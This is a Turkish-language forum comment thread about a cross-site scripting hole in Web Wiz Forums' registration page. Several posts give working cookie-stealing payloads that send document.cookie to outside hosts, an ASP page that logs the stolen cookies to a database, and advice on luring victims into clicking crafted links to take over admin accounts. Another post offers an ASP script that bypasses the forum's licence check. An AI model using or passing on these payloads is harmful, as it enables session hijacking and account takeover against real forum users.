Web Wiz Forums Registration Rules XSS Vulnerability - Yorumlar

aylinistanbl

aylinistanbl — Pzt, 21 May 2007 16:20:29 +0200

Arkadaslar,

ben yeni bir uyeyim burada. Insallah beni araniza kabul edersiniz. Icinizde bana tavsiye edebileceginiz bir forum barindirma url verebilecek varmi? En onemlisi turkce desteginin olmasi tabiiki, cunku ingilizcem yok denecek kadar az. Birde uzun zaman piyasada olsunki gelecegi saglam olsun. Ingilizce hosting veren birkac yerden denedim ama yarisi beni anlamiyor, digerlerinide ben anlamiyorum, ayrica birkac taneside kisa bir sure sonra piyasadan cekildiler.

Bana onerebileceginiz hangi adresler var? Birkac ozelliginide sayarmisiniz ltf?

Iyi sohbetler
Ayln

herooOOoooOOOooo

herooOOoooOOOooo — Per, 28 Ara 2006 00:44:21 +0200

Turan amca sana Yürekden katiliyorum buyuyunce senin gipi olucam ben kahraman asp(: yaw abi öleceksin hala asp dion saisal vursun zayiflama merkezi açicam sana

Rekojo

Rekojo — Paz, 07 May 2006 14:54:05 +0200

A great piece of work. Please keep it up! I have loved your site.http://superavto.info <a href="http://superavto.info">auto insurance</a>

BITIRIM HACKER [SFC]

BITIRIM HACKER [SFC] — Cum, 16 Eyl 2005 03:26:47 +0200

Arkadasim biraz ayrintili anlatayim ben XSS basittir ama yinede Ferruh Beyin dedigin gibi Cookie konusunu iyi kavramaniz lazim.Her neyse arkadas bir yolla Link tiklattik dedi eger asp biliyorsan kisinin cookie bilgilerini alabilirsin...

<script> document.location ='http://sitemiz.com/XSS.ASP?XSS='+ document.cookie </script>

dedigimizde bizim sitemize cookieler yollanacaktir.Sonrasi kolay cookie klasörüne cookieyi atin iste bu kadar.Takildiginiz bir sey olursa yine sorabilirsiniz...

Durun size bir kayit sayfasi hazirlayayim Bi veritabani yaratin access ile sonra xss diye bi sütun atin degeri not olsun...
Örnegin ;

<%
xss = Request.QueryString ("xss")

BITIRIM = "Provider=Microsoft.Jet.OLEDB.4.0 ; Data Source = " & Server.Mappath("db.mdb") & ";"
Set Conn = Server.CreateObject ("ADODB.Connection")
Conn.Open BITIRIM

Set Rs = Server.CreateObject ("ADODB.Recordset")
strSQL = "SELECT * From tblXSS"
Rs.Open strSQL, BITIRIM, 1,3

Rs.AddNew

Rs("xss")= xss

Rs.Update
Rs.Close
%>

Iste bu kadar bunu XSS.Asp olarak kaydedin...Hosta atin...

Kolay Gelsin

Tuna

Tuna — Sal, 07 Haz 2005 04:42:05 +0200

Bir sey soracaktim
ayni konu hakkinda..

function_filters.asp de sanirim sundan bahsetmis.
eger ki bu kod sayfada birden fazla ise digerini html olrak gösterme

diyecegim su
<link rel="stylesheet" href="includes/stile.css" type="text/css" />
gibi bisey diyelim
buradaki link koduda function_filters.asp ye dahil edilmis..

bu sayfadaki link kodunu yukarda yazdigim seyi bazalarak function_filters.asp sayfasinda iptal etsek guvenlik sorunu teskil eder mi?
( <link rel="stylesheet" href="includes/stile.css" type="text/css" /> sayfanin birinde iki tane ve birini html olarak algilamiyor ve direkt yazi olarak çikiyordu..bende gözü bozmasin diye function_filters.aspde link kodunu iptal ettim. olay bu )
umarim anlatabilmisimdir
saygilar

Tuna

Tuna — Sal, 07 Haz 2005 04:33:24 +0200

Bu açikla forumuma denemedigim kalmadi. bir türlü giremedim.
baska forumada denedim. onada giremedim
ya bir yerde hata yaptim . yada açik kapatildi...

Zaten su an itibariyle web wiz 7.91 çikti ve function_filters.aspnin guncellenmesi ile xss açiginin kapatildgi söyleniyor
borg efendide aynini söylüyor ya.
genede suna inanirim girilmeyecek site girilmeyecek forum yoktur. yeterki kötü niyet olsundiyorum ve son sözüm keske kimse kötü niyetli olmasa..

engn yilmaz

engn yilmaz — Cmt, 02 Nis 2005 11:37:58 +0200

merhaba
aspindir.com dan nuri cengiz beyin düzenledigi 7.9 siteme kurdum bir hafta sonra bir arkadas foruma admin olarak girdi
bu hangi açiktir
hata nerde
orjinal siteden indiirmemedemi
yoksa

Turan CAN

Turan CAN — Cum, 22 Eki 2004 08:36:08 +0200

var i:integer; HavaAtanArtist:string; begin HavaAtanArtist:='Helgin Helginov';

Tahrip.com icin ayip olan bir durum yok senin bakis açinla bizim bakis açimiz farkli...

Web Wiz dünya üzerinde asp olarak en iyi bilinen forum ve bukadar emek verilmis bir forumu harap etmek pekte yakisir alir bir durum degil...

Bir programi crack leye biliriz bu sadece serial istedigi içindir ancak web wiz bizden seri al istemiyor ve herhangi bir sekildede illa register edin demiyor dimi !!! soruyorum sana neden crack leyelim gözteris içinmi ? yoksa aha bak ben yapabiliyorum içinmi ?

ASP bilen her developer o banneri çok ama çok rahatlikla kaldira bilir...

Not:Biraz kskanman için 13 yasindaki yenim ASP yaziyor kendine iyi bak ---->

for i:=1 to 1000 do begin ShowMessage(HavaAtanArtist); end; end;

{yada asp ile ayin artistine mesaj verelim }

<% for i = 0 to 100 Response.Write "Helgin Helginov" next %>

C-Sharp yada open gl de istermisin ?

Helgin Helginov

Helgin Helginov — Paz, 17 Eki 2004 01:14:44 +0200

Web wiz forum 7.9 daki reklamlari bedava kaldirabilirsiniz. Söyleyeceklerimi dikkatle dinleyin. Asagida verdigim kodu helgin.asp adiyla kaydedip forumun içindeki admin klasorune kopyalayin daha sonra foruma admin olarak giris yapin ve sitenizinadresi/forum/admin/helgin.asp yi çagirin artik reklam meklam kalmadi vatana millete hayirli olsun . Tahrip.com forumunu hala reklamli kullaniyor bu bir hack sitesi için büyük bir ayip sizde hemen uygulayin..

helgin.asp basliyor.



<%

Response.Buffer = True
Dim blnLinksRemoved, blnWrongCode, strEnteredSerial, strFID, blnFieldsXX, strLiName, strLiEM, strLiType, strXCode, blnLCode, strLiURL, saryLiEnteredSerial, strLiEncodedCode, strLiS1, strLiS2
blnLinksRemoved = false
blnWrongCode = false
blnFieldsXX = false
strCode = "BFE33F5B3BEC351BF32F9FE55DC2F8EFF33C297D"
strCode2 = "73ADD37AB4EF0672557E1AD37886325159BA4E0C"
strFID = decodeString(strCodeField)
strCode = decodeString(strCode)
strSQL = "EXECUTE " & strDbProc & "SelectConfiguration"
strSQL = "SELECT " & strDbTable & "Configuration.* From " & strDbTable & "Configuration;"
With rsCommon
.Open strSQL, adoCon, 2, 3
blnLCode = CBool(.Fields("L_code"))
strLiName = Request.Form("liname")
strLiEM = Request.Form("email")
strLiType = Request.Form("cType")
strLiURL = Request.Form("URL")
strXCode= UCase(Trim(Replace(Request.Form("code"), "'", "", 1, -1, 1)))
strLiS1 = Left(strXCode, 2)
strLiS2 = Right(strXCode, 5)
strEnteredSerial = Mid(strXCode, 4, 40)
strLiEncodedCode = HashEncode(strLiS2 & LCase(strLiURL) & strLiS1)
strEnteredSerial = HashEncode((LCase(strXCode) & strSalt))
.Fields(strFID) = False
.Update
blnLinksRemoved = True
Application("blnConfigurationSet") = false
On Error Resume Next
Call codeChecker(strLiName, strLiEM, strLiType, strLiURL, strXCode, strVersion)
blnWrongCode = True
rsCommon.Close
Set rsCommon = Nothing
Set adoCon = Nothing
Set adoCon = Nothing
End With
If blnLinksRemoved = True Then
Response.write "<center>Web Wiz Forum 7.9 basarili bir sekilde hacklenmistir. Vatana millete hayirli olsun." & chr(10)
Response.write "
I Love Tahribat.com</center>"
End If

%>

helgin.asp bitti

web wiz de bu tip seyler çok..
-FIXED
-FIXED

MalcolmX

MalcolmX — Pzt, 09 Ağu 2004 14:49:38 +0200

Patch'i indirdim ancak hala forumuma kuraldisi giris yapiliyor .. Nasil engelleyecegiz bunlari ?

Erkan cengiz

Erkan cengiz — Çar, 14 Tem 2004 06:32:17 +0200

Tamam Olayi cozdum bir nevi Fake mail olayi fakat xss sayfasini nasil hazirlayacagiz ve xss aciklari hakkinda biraz daha bilgi Lutfen

Ferruh Mavituna

Ferruh Mavituna — Çar, 14 Tem 2004 04:16:34 +0200

Aslinda yazcak o kadar çok sey varki maalesef henüz yetisemiyoruz. Ancak bu konularda detayli makaleler yazmak aklimda.

Burada her seyden öte XSS (Cross Site Scripting) açiklarini bilmek zorundasiniz, ondan öncesinde de Session nedir, Cookie nedir gibi seyleri de iyi derecede kavramis olmalisiniz.

Dolayisiyla bu açigi burada alip detayli anlatamiyorum maalesef ancak basitçe söyleyeyim;
[victim] yerine kurban denilen yani açik bulunan site konulacak.http://ferruh.mavituna.com/xss ise sizin daha önceden hazirladiginiz ve gelen tüm datalari kaydeden loglama mekanizmanizin olmasi gerekiyor.

Victimin bulundupu adresi bir sekilde iframe/frame vs. içerisinde yada direk mail ile tiklatma yolu ile forumda hesabini almak istediginiz kisiye ulastimaniz gerekiyor. Ondan sonra bu kisinin forum bilgileri daha önceden hazirlamis oldugunuz loglama alanina düsecek. Ondan sonra bu bilgiler ile siteye giris yapabilirsiniz. Tabii ki bu da o kadar basit degil. Cookie injection veya benzer sekilde cookiedeki sifreyi çözmek ile mümkün ancak.

ErKan Cengiz

ErKan Cengiz — Çar, 14 Tem 2004 03:45:13 +0200

Bunuda cozdum galiba

http://www.adres.net/forumlar/register.asp?FID="><img%20width=0%20height=0%20s%20rc="javascript:document.images[0].src='http://ferruh.mavituna.com/xss/?'+document.cookie">

ama bu 'http://ferruh.mavituna.com/xss kisim ne olucak anlamadim hedef sitemi olucak ??????? bize biraz anLat be ferruh bey

sk

sk — Pzt, 05 Tem 2004 12:06:31 +0200

registration_rules.asp?FID=%22%3E%3Cimg+width%3D0+height%3D0+src%3D%22javascript%3Adocument%2Eimages%5B0%5D%2Esrc%3D%27http%3A%2F%2Fferruh%2Emavituna%2Ecom%2Fxss%2F%3F%27%2Bdocument%2Ecookie%22%3E

Bu örnegi lutfen acarmisiniz? Mesala admin hesabini almak istiyoruz veya daha baska bie fonksiyon yapmak istiyoruz..

Simdiden tesekkurler

Selim Topaloglu

Selim Topaloglu — Per, 17 Haz 2004 13:41:25 +0200

Tesekkürler